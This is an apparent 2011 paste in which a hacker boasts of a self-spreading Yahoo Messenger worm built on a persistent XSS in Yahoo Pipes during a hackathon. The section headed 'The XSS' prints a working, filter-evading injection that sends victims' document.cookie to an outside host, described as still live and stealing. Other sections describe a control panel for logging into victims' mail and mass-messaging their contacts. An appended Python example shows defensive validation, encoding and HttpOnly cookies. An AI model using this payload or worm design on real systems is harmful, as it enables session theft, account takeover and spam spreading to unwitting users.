pax

By: a guest on May 15th, 2011  |  syntax: None  |  size: 6.77 KB  |  views: 5,163  |  expires: Never
In this document I joined all the responses, tweets and other pastes for easy access and no expiration. Please RT this.

=======================
The event
=======================

/*
This weekend I attended Yahoo OpenHack Bucharest. I signed up only for TechTalks, but after some abstract useless shit about crappy Yahoo frameworks and services I thought I needed some relaxation. In about 10 minutes, in my Pall Mall break, I found an XSS in Yahoo's Pipe service ( pipes.yahoo.com ). I did some social and got into the programming sessions for the next day's project presentation. After 6 hours I managed to specially craft my persistent XSS injection so that it could run on any browser. After 15 hours, my team mate Cheater and I wrote down our project : Yahoo Self Spreading Worm via Instant Messaging using an ALIVE XSS. Note that our project was the only one that truly defined the term "hack" ( the irony ). The other 'hacks' were just some one-day Yahoo APIs and frameworks implementations, mainly oriented to the social area ( though there was a nice facial recon project ). The victims were accessing the worm which ran the XSS payload to steal their cookies and used them to fetch and spam their contacts for further grabbing and spamming. We had 90s to present our work; just an orientative limit ( if the project was interesting then the jury permitted you to pass this limit by about 30s ). I took my place on the stage, connected my laptop to their wired network and projector. 70s after I started talking about the worm ( time in which the crowd was shouting and enthusiastic ) my internet connection started to malfunction. At the 90th second they muted my microphone and unplugged me from the projector. I refused to let it go and told them that "They should see this", but in vain; they seemed very offended. After the software presentations ended, the jury ( formed by big hot shots from Yahoo ) called me to talk with them.
I fully disclosed the unsanitized vulnerable parameter in their Pipe service, I showed them how it works, how it grabs, how it spams, sends, checks, I even tested it to grab my own cookies for further demonstration ( which was a success ). I did all of this because I was hoping for a place on the podium. At the end, they didn't mention me, didn't thank me, didn't salute me. In my objective opinion ( and others' as well ) they were complete bitches, but it doesn't matter because I fucked them at their own 'hack' contest.
*/

(Another one:)

/*
Cheater & I presented a Yahoo Self Spreading Worm with an ALIVE XSS attached to it. Our team was called "Screw Tinkode the Skiddie" and we are part of the Romanian Security Team ( rstcenter.com ). We found the XSS hole on the first day of OpenHack ( 10 minutes to find it, 6 hours to craft the injection for filter evasion ) and it took us 15 hours to develop the worm. The worm was self spreading via instant messaging on Yahoo Messenger. The contacts were receiving IMs with a link appended to them; if they opened the malicious web page, their cookies were stolen and given to the worm. Having new victims, the worm uses their cookies to spread more IMs with malicious content. Besides the automated process, we also had a control panel with the following functions ( all based on cookie authentication and manipulation, no password required ) :

- list all the victims by their Yahoo IDs
- log in on a victim's email account
- fetch a victim's contact list
- mass send a message to all of a victim's contacts

I didn't have enough time to present the control panel due to sabotage; no more internet access.

After my incomplete short presentation of the full potential of the worm, in the break between the software and hardware presentations, the Yahoo Jury ( formed by big shot guys ) had a little talk with me and Cheater.
*/

=======================
The interview
=======================

/*
Korben interviewed me at OpenHack while I was working on the worm.
URL : http://www.korben.info/xss-yahoo-mail.html

For the moment I am chatting with journalists, so expect some articles somewhere :)
*/

======================
The XSS
======================

/*
Still alive and stealing at (UTC+02:00) 1:27:11 AM Monday, May 16, 2011.

The XSS injection :

<!--<img src="--><img id="poza" name="poza" src=""><img src=y onerror="document['poza'].src = 'http://0.505.ru/openhax/stream.php?cook='+escape(document.cookie)" //">

Can be found running in my pipe.
URL : http://pipes.yahoo.com/pipes/pipe.edit?_id=5828e3e6f06bd006372d3969a93abc21
*/

======================
Further Details
======================

/*
The story is as simple as it gets :

I raced for a prize and that XSS hole I found was perfect. I made my worm crawl just like in honey. The Yahoo big shots were upset about that and fucked me off. Some Romanian guy, part of the staff, told me that they were considering giving me something, but thinking is not acting. This is not a frustration because I didn't get a prize; now I have more than enough, I have my story being published over the internet; I managed to expose the Yahoo security and their officials' reaction to this kind of stuff at their own event, and this was the main purpose !

Some tech info :

Yahoo Pipes is a service for those developers who use Yahoo tools. I managed to trick a URL input Pipe module so that it will spit out my malicious code when accessed. That malicious code makes a request to my page with your cookies, saving them for instant or later use. Using your cookies means that I can access your email account without any password and, because of my self spreading technique function, I can mass instant message all of your contacts from your Yahoo ID pointing them to follow a malicious web page that has the hidden Pipe module somewhere inside it, and the chain goes on.

As soon as I disclosed the vulnerability, a Yahoo big shot started writing SMS. I thought it would be patched by now, but it seems that they are having difficulties.

I will release a video in which I explain the vulnerability to the Yahoo hot shots. Must see their faces.
*/
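As an added example (not part of the original paste, and not Yahoo's or the Pipes service's code), the following Python shows the server-side handling that the unsanitized URL parameter described in "The XSS" and "Some tech info" lacked: reject anything that is not an absolute http(s) URL, encode the value for the HTML attribute context on output so it can never close the attribute or open a new tag, and issue the session cookie with HttpOnly so an injected script cannot read it from document.cookie. The breakout sample string, the example host names and all function names are constructed for this example; the breakout string copies the comment-plus-attribute-close structure of the paste's injection but carries a harmless handler body.

```python
import html
import re
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

# Constructed sample inputs (not real traffic): a benign feed URL, a URL with
# a query string, and an attribute-breakout string with the same structure as
# the paste's injection (HTML comment, early attribute close, second <img>
# with an onerror handler) but a harmless handler body.
BENIGN_URL = "http://example.com/feed.xml"
QUERY_URL = "http://example.com/?a=1&b=2"
BREAKOUT = '<!--<img src="--><img src=y onerror="document.title=\'x\'" //">'


def is_valid_http_url(value: str) -> bool:
    """Input validation: absolute http/https URL with a host, and none of the
    characters that let a value break out of a quoted HTML attribute."""
    if not value or re.search(r"[\s<>\"']", value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_img_unsafe(url: str) -> str:
    """The 'before' picture: raw string interpolation into an attribute,
    the class of defect the paste describes. Shown only to contrast."""
    return '<img src="%s">' % url


def render_img_encoded_only(url: str) -> str:
    """Output encoding alone: html.escape with quote=True turns < > & " ' into
    entities, so the value stays inside the attribute even without validation."""
    return '<img src="%s">' % html.escape(url, quote=True)


def render_img(url: str) -> str:
    """Defense in depth: validate first, then encode for the attribute context."""
    if not is_valid_http_url(url):
        raise ValueError("rejected: not an absolute http(s) URL")
    return render_img_encoded_only(url)


def count_tags(markup: str) -> int:
    """Count tag openers ('<' followed by a letter, '!' or '/'). A safe render of
    one image must contain exactly one; more means the value broke out."""
    return len(re.findall(r"<[a-zA-Z!/]", markup))


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value for a session cookie that script cannot read:
    HttpOnly blocks document.cookie, Secure keeps it off plain HTTP,
    SameSite=Lax limits cross-site sends (samesite needs Python 3.8+)."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    jar[name]["path"] = "/"
    return jar[name].OutputString()


if __name__ == "__main__":
    unsafe = render_img_unsafe(BREAKOUT)
    print("unsafe render, tag openers:", count_tags(unsafe))        # 4
    print("encoded render:", render_img_encoded_only(BREAKOUT))      # still one tag
    print("validated render:", render_img(QUERY_URL))
    try:
        render_img(BREAKOUT)
    except ValueError as err:
        print("validation:", err)
    print("Set-Cookie:", session_cookie_header("sid", "opaque-session-id"))
```

The two layers are deliberately independent: validation catches the malformed value at the boundary, and attribute encoding makes the rendering safe even for a value that slipped past a weaker filter, which is exactly the situation the paste's "6 hours to craft the injection for filter evasion" describes. The cookie flags do not stop the injection itself, but they remove the document.cookie read the worm's propagation depended on.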

======================
Mentions
======================

/*
The Secret Services took part and took photos at the event. I'm not the only one who spotted them.
*/

======================
The Team
======================

/*
Composed of me ( pax ) and Cheater.
Team called : "Screw Tinkode the Skiddie".
Project named : "Yahoo Self Spreading Worm".
Photos with us :
http://rstcenter.com/forum/33822-yahoo-open-hack-europe-2011-a-4.rst#post237259
Kisses for : Nytro, Cifratorul, Turnback, Alex, Seven, Cristig.
*/

======================
Updates
======================

/*
Stay close to twitter.com/paxnwo
*/

======================
Contact
======================

/*
pax/|@|\secure.cn.com
*/